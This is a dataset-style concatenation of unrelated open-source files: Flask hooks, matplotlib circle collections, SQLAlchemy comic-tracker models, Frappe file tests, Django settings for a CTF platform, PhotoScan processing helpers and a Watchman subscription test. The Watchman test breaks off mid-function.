render = Animate(SIZE, BACK, FRONT, wrap)
render.start()
if __name__ == '__main__':
main()
| mit | 5,529,219,206,050,234,000 | 17.262069 | 60 | 0.628021 | false |
pastgift/seed-website-py | app/index/hooks.py | 1 | 1472 | # -*- coding: utf-8 -*-
from flask import render_template, request, jsonify, flash, g
from flask.ext.login import current_user
from . import index_blueprint
from .. import db
from .. import babel
from ..models import User
from datetime import datetime
@index_blueprint.before_app_request
def before_request():
if not request.user_agent.browser:
return
user_browser = request.user_agent.browser.lower()
if user_browser != 'chrome':
# Do some thing
pass
@index_blueprint.after_app_request
def after_request(res):
# Record latest access
if current_user.is_authenticated:
current_user.ping()
return res
@babel.localeselector
def get_locale():
'''
Select Language Tag
'''
lang = request.cookies.get('lang', 'en')
# Uncomment to auto match language
# if not lang:
# lang = request.accept_languages.best_match(['zh_CN', 'zh_TW', 'ja'])
babel_lang_alias = {
'zh_CN': 'zh_Hans_CN',
'zh_TW': 'zh_Hant_TW',
'ja' : 'ja_JP',
# Add more languages
#'<Setting Name>': 'Babel Locale Name'
}
datepicker_lang_alias = {
'zh_CN': 'zh-CN',
'zh_TW': 'zh-TW',
# Add more languages
#'<Setting Name>': 'jQuery-datapicker Locale Name'
}
g.lang = lang
g.babel_lang = babel_lang_alias.get(lang, lang)
g.datepicker_lang = datepicker_lang_alias.get(lang, lang)
return g.babel_lang | mit | 1,368,370,693,941,926,000 | 23.147541 | 78 | 0.608696 | false |
dean0x7d/pybinding | pybinding/support/collections.py | 1 | 3143 | import numpy as np
from matplotlib.collections import Collection
from matplotlib.artist import allow_rasterization
# noinspection PyAbstractClass
class CircleCollection(Collection):
"""Custom circle collection
The default matplotlib `CircleCollection` creates circles based on their
area in screen units. This class uses the radius in data units. It behaves
like a much faster version of a `PatchCollection` of `Circle`.
The implementation is similar to `EllipseCollection`.
"""
def __init__(self, radius, **kwargs):
super().__init__(**kwargs)
from matplotlib import path, transforms
self.radius = np.atleast_1d(radius)
self._paths = [path.Path.unit_circle()]
self.set_transform(transforms.IdentityTransform())
self._transforms = np.empty((0, 3, 3))
def _set_transforms(self):
ax = self.axes
self._transforms = np.zeros((self.radius.size, 3, 3))
self._transforms[:, 0, 0] = self.radius * ax.bbox.width / ax.viewLim.width
self._transforms[:, 1, 1] = self.radius * ax.bbox.height / ax.viewLim.height
self._transforms[:, 2, 2] = 1
@allow_rasterization
def draw(self, renderer):
self._set_transforms()
super().draw(renderer)
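# Minimal usage sketch (illustrative, not part of the original module): the
# circles keep a fixed radius in data units however the figure is resized.
# The positions, radius and axis limits below are assumptions.
def _example_circle_collection():
    import matplotlib.pyplot as plt
    positions = np.array([[0.0, 0.0], [1.0, 1.0], [2.0, 0.0]])
    fig, ax = plt.subplots()
    circles = CircleCollection(radius=0.2, offsets=positions, transOffset=ax.transData)
    ax.add_collection(circles)
    ax.set_xlim(-1, 3)
    ax.set_ylim(-1, 2)
    return fig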
class Circle3DCollection(CircleCollection):
def __init__(self, radius, zs=0, zdir='z', depthshade=True, **kwargs):
super().__init__(radius, **kwargs)
self._depthshade = depthshade
self.set_3d_properties(zs, zdir)
self._A0 = self._A
def set_array(self, array):
self._A0 = array
super().set_array(array)
def set_3d_properties(self, zs, zdir):
# Force the collection to initialize the face and edgecolors
# just in case it is a scalarmappable with a colormap.
self.update_scalarmappable()
offsets = self.get_offsets()
if len(offsets) > 0:
xs, ys = list(zip(*offsets))
else:
xs = []
ys = []
from mpl_toolkits.mplot3d.art3d import juggle_axes
self._offsets3d = juggle_axes(xs, ys, np.atleast_1d(zs), zdir)
self._facecolor3d = self.get_facecolor()
self._edgecolor3d = self.get_edgecolor()
def do_3d_projection(self, renderer):
from mpl_toolkits.mplot3d import proj3d
from mpl_toolkits.mplot3d.art3d import zalpha
from matplotlib import colors as mcolors
# transform and sort in z direction
v = np.array(proj3d.proj_transform_clip(*self._offsets3d, M=renderer.M)[:3])
idx = v[2].argsort()[::-1]
vzs = v[2, idx]
self.set_offsets(v[:2, idx].transpose())
super().set_array(self._A0[idx])
fcs = zalpha(self._facecolor3d, vzs) if self._depthshade else self._facecolor3d
fcs = mcolors.colorConverter.to_rgba_array(fcs, self._alpha)
self.set_facecolors(fcs)
ecs = zalpha(self._edgecolor3d, vzs) if self._depthshade else self._edgecolor3d
ecs = mcolors.colorConverter.to_rgba_array(ecs, self._alpha)
self.set_edgecolors(ecs)
return min(vzs) if vzs.size > 0 else np.nan
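# Note (added): Circle3DCollection is intended for a mpl_toolkits.mplot3d axes;
# set_3d_properties stores the z coordinate of each circle and do_3d_projection
# re-sorts the circles by depth (and optionally depth-shades them) on each draw.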
| bsd-2-clause | 452,870,017,756,134,800 | 36.416667 | 87 | 0.634108 | false |
KenleyArai/ComicbookTime | app/models.py | 1 | 4953 | from app import db
from flask.ext.security import RoleMixin
from datetime import datetime
# Defining the table for the many-to-many relationship of User and Comic
bought_comics = db.Table('bought',
db.Column('user_id', db.Integer, db.ForeignKey('user.id')),
db.Column('comic_id', db.Integer, db.ForeignKey('comic.id')),
)
follows_series = db.Table('follows',
db.Column('user_id', db.Integer, db.ForeignKey('user.id')),
db.Column('series_id', db.Integer, db.ForeignKey('series.id')),
)
created = db.Table('created_comic',
db.Column('creator_id', db.Integer, db.ForeignKey('creator.id')),
db.Column('comic_id', db.Integer, db.ForeignKey('comic.id')),
)
# Define models
roles_users = db.Table('roles_users',
db.Column('user_id', db.Integer(), db.ForeignKey('user.id')),
db.Column('role_id', db.Integer(), db.ForeignKey('role.id')))
class Role(db.Model, RoleMixin):
id = db.Column(db.Integer(), primary_key=True)
name = db.Column(db.String(80), unique=True)
description = db.Column(db.String(255))
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
google_id = db.Column(db.String, unique=True)
# many to many: A user can have many comics
bought_comics = db.relationship('Comic',
secondary=bought_comics,
backref=db.backref('users', lazy='dynamic'),
order_by='Comic.series_id')
follows_series = db.relationship('Series',
secondary=follows_series,
backref=db.backref('users', lazy='dynamic'))
roles = db.relationship('Role',
secondary=roles_users,
backref=db.backref('users', lazy='dynamic'))
connections = db.relationship('Connection',
backref=db.backref('user', lazy='joined'),
cascade="all", uselist=False)
active = False
def is_active(self):
return True
def get_id(self):
return self.id
def is_authenticated(self):
return True
def is_anonymous(self):
return False
def __init__(self, google_id, active, roles):
self.google_id = google_id
self.active = active
self.roles = roles
def __repr__(self):
return "<Google ID {}>".format(self.google_id)
class Connection(db.Model):
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
provider_id = db.Column(db.String(255))
full_name = db.Column(db.String(255))
provider_user_id = db.Column(db.String(255))
access_token = db.Column(db.String(255))
secret = db.Column(db.String(255))
display_name = db.Column(db.String(255))
profile_url = db.Column(db.String(512))
image_url = db.Column(db.String(512))
rank = db.Column(db.Integer)
class Series(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String, unique=True)
comics = db.relationship('Comic', backref='Series',lazy='dynamic')
def __init__(self,title,comics):
self.title = title
self.comics = comics
def __repr__(self):
return "{}".format(self.title)
class Comic(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String, unique=True)
source_url = db.Column(db.String)
image_link = db.Column(db.String)
release_date = db.Column(db.DateTime)
series_id = db.Column(db.Integer, db.ForeignKey('series.id'))
def __init__(self, title, source_url, image_link, release_date):
self.title = title
self.source_url = source_url
self.image_link = image_link
self.release_date = release_date
def is_avail(self):
return self.release_date < datetime.now()
def get_dict(self):
return {'id': self.id,
'title': self.title,
'source_url': self.source_url,
'image_link': self.image_link,
'release_date': datetime.date(self.release_date).isoformat(),
'series_id': self.series_id,
'avail': self.is_avail()}
def __repr__(self):
data = self.get_dict()
return "<Title:{title}><Source Url:{source_url}><Image Link:{image_link}><Release Date:{release_date}>".format(**data)
class Creator(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String, unique=True)
created_comics = db.relationship('Comic',
secondary=created,
backref=db.backref('creator', lazy='dynamic'))
| mit | -8,246,468,935,077,410,000 | 35.153285 | 126 | 0.566727 | false |
kaji-project/adagios | adagios/myapp/urls.py | 1 | 1069 | # Adagios is a web based Nagios configuration interface
#
# Copyright (C) 2014, Pall Sigurdsson <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import url, patterns
urlpatterns = patterns('adagios',
(r'^/?$', 'myapp.views.hello_world'),
(r'^/url1?$', 'myapp.views.hello_world'),
(r'^/url2?$', 'myapp.views.hello_world'),
)
| agpl-3.0 | 3,705,995,088,820,243,000 | 43.541667 | 74 | 0.680075 | false |
adityahase/frappe | frappe/core/doctype/file/test_file.py | 1 | 10524 | # -*- coding: utf-8 -*-
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# See license.txt
from __future__ import unicode_literals
import base64
import frappe
import os
import unittest
from frappe import _
from frappe.core.doctype.file.file import move_file
from frappe.utils import get_files_path
# test_records = frappe.get_test_records('File')
test_content1 = 'Hello'
test_content2 = 'Hello World'
def make_test_doc():
d = frappe.new_doc('ToDo')
d.description = 'Test'
d.save()
return d.doctype, d.name
class TestSimpleFile(unittest.TestCase):
def setUp(self):
self.attached_to_doctype, self.attached_to_docname = make_test_doc()
self.test_content = test_content1
_file = frappe.get_doc({
"doctype": "File",
"file_name": "test1.txt",
"attached_to_doctype": self.attached_to_doctype,
"attached_to_name": self.attached_to_docname,
"content": self.test_content})
_file.save()
self.saved_file_url = _file.file_url
def test_save(self):
_file = frappe.get_doc("File", {"file_url": self.saved_file_url})
content = _file.get_content()
self.assertEqual(content, self.test_content)
def tearDown(self):
# File gets deleted on rollback, so blank
pass
class TestBase64File(unittest.TestCase):
def setUp(self):
self.attached_to_doctype, self.attached_to_docname = make_test_doc()
self.test_content = base64.b64encode(test_content1.encode('utf-8'))
_file = frappe.get_doc({
"doctype": "File",
"file_name": "test_base64.txt",
"attached_to_doctype": self.attached_to_doctype,
"attached_to_docname": self.attached_to_docname,
"content": self.test_content,
"decode": True})
_file.save()
self.saved_file_url = _file.file_url
def test_saved_content(self):
_file = frappe.get_doc("File", {"file_url": self.saved_file_url})
content = _file.get_content()
self.assertEqual(content, test_content1)
def tearDown(self):
# File gets deleted on rollback, so blank
pass
class TestSameFileName(unittest.TestCase):
def test_saved_content(self):
self.attached_to_doctype, self.attached_to_docname = make_test_doc()
self.test_content1 = test_content1
self.test_content2 = test_content2
_file1 = frappe.get_doc({
"doctype": "File",
"file_name": "testing.txt",
"attached_to_doctype": self.attached_to_doctype,
"attached_to_name": self.attached_to_docname,
"content": self.test_content1})
_file1.save()
_file2 = frappe.get_doc({
"doctype": "File",
"file_name": "testing.txt",
"attached_to_doctype": self.attached_to_doctype,
"attached_to_name": self.attached_to_docname,
"content": self.test_content2})
_file2.save()
self.saved_file_url1 = _file1.file_url
self.saved_file_url2 = _file2.file_url
_file = frappe.get_doc("File", {"file_url": self.saved_file_url1})
content1 = _file.get_content()
self.assertEqual(content1, self.test_content1)
_file = frappe.get_doc("File", {"file_url": self.saved_file_url2})
content2 = _file.get_content()
self.assertEqual(content2, self.test_content2)
def test_saved_content_private(self):
_file1 = frappe.get_doc({
"doctype": "File",
"file_name": "testing-private.txt",
"content": test_content1,
"is_private": 1
}).insert()
_file2 = frappe.get_doc({
"doctype": "File",
"file_name": "testing-private.txt",
"content": test_content2,
"is_private": 1
}).insert()
_file = frappe.get_doc("File", {"file_url": _file1.file_url})
self.assertEqual(_file.get_content(), test_content1)
_file = frappe.get_doc("File", {"file_url": _file2.file_url})
self.assertEqual(_file.get_content(), test_content2)
class TestSameContent(unittest.TestCase):
def setUp(self):
self.attached_to_doctype1, self.attached_to_docname1 = make_test_doc()
self.attached_to_doctype2, self.attached_to_docname2 = make_test_doc()
self.test_content1 = test_content1
self.test_content2 = test_content1
self.orig_filename = 'hello.txt'
self.dup_filename = 'hello2.txt'
_file1 = frappe.get_doc({
"doctype": "File",
"file_name": self.orig_filename,
"attached_to_doctype": self.attached_to_doctype1,
"attached_to_name": self.attached_to_docname1,
"content": self.test_content1})
_file1.save()
_file2 = frappe.get_doc({
"doctype": "File",
"file_name": self.dup_filename,
"attached_to_doctype": self.attached_to_doctype2,
"attached_to_name": self.attached_to_docname2,
"content": self.test_content2})
_file2.save()
def test_saved_content(self):
self.assertFalse(os.path.exists(get_files_path(self.dup_filename)))
def tearDown(self):
# File gets deleted on rollback, so blank
pass
class TestFile(unittest.TestCase):
def setUp(self):
self.delete_test_data()
self.upload_file()
def tearDown(self):
try:
frappe.get_doc("File", {"file_name": "file_copy.txt"}).delete()
except frappe.DoesNotExistError:
pass
def delete_test_data(self):
for f in frappe.db.sql('''select name, file_name from tabFile where
is_home_folder = 0 and is_attachments_folder = 0 order by creation desc'''):
frappe.delete_doc("File", f[0])
def upload_file(self):
_file = frappe.get_doc({
"doctype": "File",
"file_name": "file_copy.txt",
"attached_to_name": "",
"attached_to_doctype": "",
"folder": self.get_folder("Test Folder 1", "Home").name,
"content": "Testing file copy example."})
_file.save()
self.saved_folder = _file.folder
self.saved_name = _file.name
self.saved_filename = get_files_path(_file.file_name)
def get_folder(self, folder_name, parent_folder="Home"):
return frappe.get_doc({
"doctype": "File",
"file_name": _(folder_name),
"is_folder": 1,
"folder": _(parent_folder)
}).insert()
def tests_after_upload(self):
self.assertEqual(self.saved_folder, _("Home/Test Folder 1"))
file_folder = frappe.db.get_value("File", self.saved_name, "folder")
self.assertEqual(file_folder, _("Home/Test Folder 1"))
def test_file_copy(self):
folder = self.get_folder("Test Folder 2", "Home")
file = frappe.get_doc("File", {"file_name": "file_copy.txt"})
move_file([{"name": file.name}], folder.name, file.folder)
file = frappe.get_doc("File", {"file_name": "file_copy.txt"})
self.assertEqual(_("Home/Test Folder 2"), file.folder)
def test_folder_depth(self):
result1 = self.get_folder("d1", "Home")
self.assertEqual(result1.name, "Home/d1")
result2 = self.get_folder("d2", "Home/d1")
self.assertEqual(result2.name, "Home/d1/d2")
result3 = self.get_folder("d3", "Home/d1/d2")
self.assertEqual(result3.name, "Home/d1/d2/d3")
result4 = self.get_folder("d4", "Home/d1/d2/d3")
_file = frappe.get_doc({
"doctype": "File",
"file_name": "folder_copy.txt",
"attached_to_name": "",
"attached_to_doctype": "",
"folder": result4.name,
"content": "Testing folder copy example"})
_file.save()
def test_folder_copy(self):
folder = self.get_folder("Test Folder 2", "Home")
folder = self.get_folder("Test Folder 3", "Home/Test Folder 2")
_file = frappe.get_doc({
"doctype": "File",
"file_name": "folder_copy.txt",
"attached_to_name": "",
"attached_to_doctype": "",
"folder": folder.name,
"content": "Testing folder copy example"})
_file.save()
move_file([{"name": folder.name}], 'Home/Test Folder 1', folder.folder)
file = frappe.get_doc("File", {"file_name":"folder_copy.txt"})
file_copy_txt = frappe.get_value("File", {"file_name":"file_copy.txt"})
if file_copy_txt:
frappe.get_doc("File", file_copy_txt).delete()
self.assertEqual(_("Home/Test Folder 1/Test Folder 3"), file.folder)
def test_default_folder(self):
d = frappe.get_doc({
"doctype": "File",
"file_name": _("Test_Folder"),
"is_folder": 1
})
d.save()
self.assertEqual(d.folder, "Home")
def test_on_delete(self):
file = frappe.get_doc("File", {"file_name": "file_copy.txt"})
file.delete()
self.assertEqual(frappe.db.get_value("File", _("Home/Test Folder 1"), "file_size"), 0)
folder = self.get_folder("Test Folder 3", "Home/Test Folder 1")
_file = frappe.get_doc({
"doctype": "File",
"file_name": "folder_copy.txt",
"attached_to_name": "",
"attached_to_doctype": "",
"folder": folder.name,
"content": "Testing folder copy example"})
_file.save()
folder = frappe.get_doc("File", "Home/Test Folder 1/Test Folder 3")
self.assertRaises(frappe.ValidationError, folder.delete)
def test_same_file_url_update(self):
attached_to_doctype1, attached_to_docname1 = make_test_doc()
attached_to_doctype2, attached_to_docname2 = make_test_doc()
file1 = frappe.get_doc({
"doctype": "File",
"file_name": 'file1.txt',
"attached_to_doctype": attached_to_doctype1,
"attached_to_name": attached_to_docname1,
"is_private": 1,
"content": test_content1}).insert()
file2 = frappe.get_doc({
"doctype": "File",
"file_name": 'file2.txt',
"attached_to_doctype": attached_to_doctype2,
"attached_to_name": attached_to_docname2,
"is_private": 1,
"content": test_content1}).insert()
self.assertEqual(file1.is_private, file2.is_private, 1)
self.assertEqual(file1.file_url, file2.file_url)
self.assertTrue(os.path.exists(file1.get_full_path()))
file1.is_private = 0
file1.save()
file2 = frappe.get_doc('File', file2.name)
self.assertEqual(file1.is_private, file2.is_private, 0)
self.assertEqual(file1.file_url, file2.file_url)
self.assertTrue(os.path.exists(file2.get_full_path()))
class TestAttachment(unittest.TestCase):
test_doctype = 'Test For Attachment'
def setUp(self):
if frappe.db.exists('DocType', self.test_doctype):
return
frappe.get_doc(
doctype='DocType',
name=self.test_doctype,
module='Custom',
custom=1,
fields=[
{'label': 'Title', 'fieldname': 'title', 'fieldtype': 'Data'},
{'label': 'Attachment', 'fieldname': 'attachment', 'fieldtype': 'Attach'},
]
).insert()
def tearDown(self):
frappe.delete_doc('DocType', self.test_doctype)
def test_file_attachment_on_update(self):
doc = frappe.get_doc(
doctype=self.test_doctype,
title='test for attachment on update'
).insert()
file = frappe.get_doc({
'doctype': 'File',
'file_name': 'test_attach.txt',
'content': 'Test Content'
})
file.save()
doc.attachment = file.file_url
doc.save()
exists = frappe.db.exists('File', {
'file_name': 'test_attach.txt',
'file_url': file.file_url,
'attached_to_doctype': self.test_doctype,
'attached_to_name': doc.name,
'attached_to_field': 'attachment'
})
self.assertTrue(exists)
| mit | -7,613,170,055,564,613,000 | 26.989362 | 88 | 0.666952 | false |
HackerDom/qoala | qoala/settings/common.py | 1 | 4599 | # -*- coding: utf-8 -*-
"""
Django settings for qoala project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import sys
from django.conf import global_settings
# https://stackoverflow.com/a/21693784/6832066
# list() guards against the default being a tuple in older Django versions
TEMPLATE_CONTEXT_PROCESSORS = list(global_settings.TEMPLATE_CONTEXT_PROCESSORS) + [
"django.core.context_processors.request",
]
PROJECT_DIR = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
BASE_DIR = os.path.dirname(PROJECT_DIR)
DATA_SUFFIX = os.environ.get('DATA_SUFFIX', '')
DATA_DIR = os.path.join(BASE_DIR, 'data' + DATA_SUFFIX)
TASKS_DIR = os.path.join(DATA_DIR, 'tasks')
TASKS_DATA_DIR = os.path.join(DATA_DIR, 'tmptasks')
INSTANCE_NAME = 'Qoala'
# App/Library Paths
sys.path.append(os.path.join(BASE_DIR, 'apps'))
sys.path.append(os.path.join(BASE_DIR, 'lib'))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '3tqlw0=fqml%ivszvim&8)$(%&#_69cmulxm-4ai-fib9=+#%*'
# Salt for generating tasks patterns
TASK_SALT = "asdkajdlkasjdlkajsdlkajlskdjalksdjkl"
ANSWERS_PER_MINUTE = 30
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
TEMPLATE_DEBUG = False
# Is this a development instance? Set this to True on development/master
# instances and False on stage/prod.
DEV = False
ALLOWED_HOSTS = []
AUTH_USER_MODEL = "teams.Team"
AUTHENTICATION_BACKENDS = ('django.contrib.auth.backends.ModelBackend', 'teams.auth.TokenAuthBackend')
LOGIN_REDIRECT_URL = '/'
LOGIN_URL = '/teams/login'
LOGOUT_URL = '/teams/logout'
SHOW_ZEROS_ON_SCOREBOARD = True
# Application definition
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.admin',
'django.contrib.humanize',
'django.contrib.staticfiles',
# Third-party apps, patches, fixes
'djcelery',
# Database migrations
# 'south',
# Global context
'base',
# Own apps
'teams',
'quests',
'board'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'qoala.urls'
WSGI_APPLICATION = 'qoala.wsgi.application'
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
#LANGUAGE_CODE = 'en-us'
LANGUAGE_CODE = 'ru'
LANGUAGES = (
('ru', 'Russian'),
('en', 'English'),
)
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
TIME_ZONE = 'Asia/Yekaterinburg'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.example.com/static/"
STATIC_ROOT = os.path.join(PROJECT_DIR, 'static')
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "base/static"),
)
# Sessions
#
# By default, be at least somewhat secure with our session cookies.
SESSION_COOKIE_HTTPONLY = True
def custom_show_toolbar(request):
""" Only show the debug toolbar to users with the superuser flag. """
return request.user.is_superuser
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': False,
'SHOW_TOOLBAR_CALLBACK': 'qoala.settings.custom_show_toolbar',
'SHOW_TEMPLATE_CONTEXT': True,
'ENABLE_STACKTRACES': True,
}
DEBUG_TOOLBAR_PATCH_SETTINGS = False
# Uncomment these to activate and customize Celery:
# CELERY_ALWAYS_EAGER = False # required to activate celeryd
#BROKER_URL = 'amqp://guest:guest@localhost//'
| gpl-3.0 | -744,898,877,219,937,500 | 25.130682 | 102 | 0.724288 | false |
rmsare/sfmtools | sfmtools.py | 1 | 2864 | """ Utility functions for PhotoScan processing """
import os, sys
import PhotoScan
def align_and_clean_photos(chunk):
ncameras = len(chunk.cameras)
for frame in chunk.frames:
frame.matchPhotos()
chunk.alignCameras()
for camera in chunk.cameras:
if camera.transform is None:
chunk.remove(camera)
naligned = len(chunk.cameras)
print('%d/%d cameras aligned' % (naligned, ncameras))
def batch_process(projectname, threshold, resolution):
doc = PhotoScan.app.document
    if projectname[-4:] != '.psz':
projectname = ''.join([projectname, '.psz'])
if os.path.isfile(projectname):
doc.open(projectname)
folders = ['dems', 'reports', 'orthos']
for folder in folders:
if not os.path.isdir(folder):
os.mkdir(folder)
for chunk in doc.chunks:
filter_photos_by_quality(chunk, threshold)
align_and_clean_photos(chunk)
chunk.buildDenseCloud(quality=PhotoScan.HighQuality)
doc.alignChunks(doc.chunks, doc.chunks[0])
doc.mergeChunks(doc.chunks, merge_dense_clouds=True, merge_markers=True)
chunk = doc.chunks[len(doc.chunks)-1]
chunk.buildModel(surface=PhotoScan.HeightField, face_count=PhotoScan.HighFaceCount)
chunk.exportDem('dems/test_0.5m.tif', format='tif', dx=0.5, dy=0.5)
#export_dems('dems/', 'tif', resolution)
#export_orthos('orthos/', resolution)
for chunk in doc.chunks:
filename = ''.join(['reports/', ''.join(chunk.label.split(' ')), '.pdf'])
chunk.exportReport(filename)
doc.save(projectname)
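# Usage sketch (illustrative, not from the original module): meant to be run
# from the PhotoScan Python console; the project name, quality threshold and
# DEM resolution below are assumptions.
def _example_batch_run():
    batch_process('survey_project', threshold=0.5, resolution=0.25)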
def export_dems(pathname, formatstring, resolution):
if not os.path.isdir(pathname):
os.mkdir(pathname)
    if pathname[-1:] != '/':
pathname = ''.join([pathname, '/'])
nchunks = len(PhotoScan.app.document.chunks)
nexported = nchunks
for chunk in PhotoScan.app.document.chunks:
filename = ''.join([pathname, ''.join(chunk.label.split(' ')), '.', formatstring])
exported = chunk.exportDem(filename, format=formatstring)
if not exported:
print('Export failed:', chunk.label)
nexported -= 1
print('%d/%d DEMs exported' % (nexported, nchunks))
def filter_photos_by_quality(chunk, threshold):
for camera in chunk.cameras:
if camera.frames[0].photo.meta['Image/Quality'] is None:
chunk.estimateImageQuality([camera])
if float(camera.frames[0].photo.meta['Image/Quality']) < threshold:
chunk.remove(camera)
def load_masks_for_chunk(chunk, mask_dir):
for camera in chunk.cameras:
label = camera.label
mask_fname = mask_dir + label + '_mask.png'
if os.path.isfile(mask_fname):
this_mask = PhotoScan.Mask.load(mask_fname)
camera.mask = this_mask
| mit | -1,115,124,108,005,124,100 | 33.506024 | 90 | 0.633729 | false |
facebook/watchman | watchman/tests/integration/test_subscribe.py | 1 | 27103 | # vim:ts=4:sw=4:et:
# Copyright 2015-present Facebook, Inc.
# Licensed under the Apache License, Version 2.0
# no unicode literals
from __future__ import absolute_import, division, print_function
import json
import os
import os.path
import pywatchman
import WatchmanTestCase
from path_utils import norm_relative_path
try:
import unittest2 as unittest
except ImportError:
import unittest
@WatchmanTestCase.expand_matrix
class TestSubscribe(WatchmanTestCase.WatchmanTestCase):
def requiresPersistentSession(self):
return True
def wlockExists(self, subdata, exists):
norm_wlock = norm_relative_path(".hg/wlock")
for sub in subdata:
if "files" not in sub:
# Don't trip over cancellation notices left over from other
# tests that ran against this same instance
continue
for f in sub["files"]:
if (
f["exists"] == exists
and norm_relative_path(f["name"]) == norm_wlock
):
return True
return False
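    # Shape sketch (added) of the subscription payloads wlockExists walks:
    # a list of dicts, each optionally carrying a "files" list such as
    # [{"name": ".hg/wlock", "exists": True}, ...]; the values shown here
    # are illustrative.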
def matchStateSubscription(self, subdata, mode):
for sub in subdata:
if mode in sub:
return sub
return None
def assertWaitForAssertedStates(self, root, states):
def sortStates(states):
"""Deterministically sort the states for comparison.
We sort by name and rely on the sort being stable as the
            relative ordering of the potentially multiple queued
entries per name is important to preserve"""
return sorted(states, key=lambda x: x["name"])
states = sortStates(states)
def getStates():
res = self.watchmanCommand("debug-get-asserted-states", root)
return sortStates(res["states"])
self.assertWaitForEqual(states, getStates)
def test_state_enter_leave(self):
root = self.mkdtemp()
self.watchmanCommand("watch", root)
result = self.watchmanCommand("debug-get-asserted-states", root)
self.assertEqual([], result["states"])
self.watchmanCommand("state-enter", root, "foo")
self.watchmanCommand("state-enter", root, "bar")
self.assertWaitForAssertedStates(
root,
[
{"name": "bar", "state": "Asserted"},
{"name": "foo", "state": "Asserted"},
],
)
self.assertListEqual(
[u"bar", u"foo"],
sorted(
self.watchmanCommand(
"subscribe",
root,
"defer",
{"fields": ["name"], "defer": ["foo", "bar"]},
).get("asserted-states")
),
)
self.watchmanCommand("state-leave", root, "foo")
self.assertWaitForAssertedStates(root, [{"name": "bar", "state": "Asserted"}])
self.watchmanCommand("state-leave", root, "bar")
self.assertWaitForAssertedStates(root, [])
def test_defer_state(self):
root = self.mkdtemp()
self.watchmanCommand("watch", root)
self.watchmanCommand(
"subscribe", root, "defer", {"fields": ["name"], "defer": ["foo"]}
)
self.touchRelative(root, "a")
self.assertNotEqual(None, self.waitForSub("defer", root=root))
def isStateEnterFoo(sub):
for item in sub:
if item.get("state-enter", None) == "foo":
return True
return False
self.watchmanCommand("state-enter", root, "foo")
sub = self.waitForSub("defer", root, accept=isStateEnterFoo)
self.assertTrue(isStateEnterFoo(sub))
self.touchRelative(root, "in-foo")
# We expect this to timeout because state=foo is asserted
with self.assertRaises(pywatchman.SocketTimeout):
self.waitForSub("defer", root, timeout=1)
self.watchmanCommand("state-leave", root, "foo")
self.assertNotEqual(
None,
self.waitForSub(
"defer",
root,
accept=lambda x: self.matchStateSubscription(x, "state-leave"),
),
)
# and now we should observe the file change
self.assertNotEqual(None, self.waitForSub("defer", root))
# and again, but this time passing metadata
self.watchmanCommand("state-enter", root, {"name": "foo", "metadata": "meta!"})
begin = self.waitForSub("defer", root)[0]
self.assertEqual("foo", begin["state-enter"])
self.assertEqual("meta!", begin["metadata"])
self.touchRelative(root, "in-foo-2")
# flush-subscriptions should let this come through immediately
flush = self.watchmanCommand(
"flush-subscriptions", root, {"sync_timeout": 1000}
)
del flush["version"]
self.assertDictEqual(
{"synced": ["defer"], "no_sync_needed": [], "dropped": []}, flush
)
sub_data = self.getSubscription("defer", root)
self.assertEqual(1, len(sub_data))
self.assertFileListsEqual(["in-foo-2"], sub_data[0]["files"])
self.touchRelative(root, "in-foo-3")
# We expect this to timeout because state=foo is asserted
with self.assertRaises(pywatchman.SocketTimeout):
self.waitForSub("defer", root, timeout=1)
self.watchmanCommand(
"state-leave", root, {"name": "foo", "metadata": "leavemeta"}
)
end = self.waitForSub(
"defer",
root,
accept=lambda x: self.matchStateSubscription(x, "state-leave"),
)[0]
self.assertEqual("leavemeta", end["metadata"])
# and now we should observe the file change
self.assertNotEqual(None, self.waitForSub("defer", root))
def test_drop_state(self):
root = self.mkdtemp()
self.watchmanCommand("watch", root)
self.watchmanCommand(
"subscribe", root, "drop", {"fields": ["name"], "drop": ["foo"]}
)
self.assertNotEqual(None, self.waitForSub("drop", root=root))
self.touchRelative(root, "a")
self.assertNotEqual(None, self.waitForSub("drop", root=root))
self.watchmanCommand("state-enter", root, "foo")
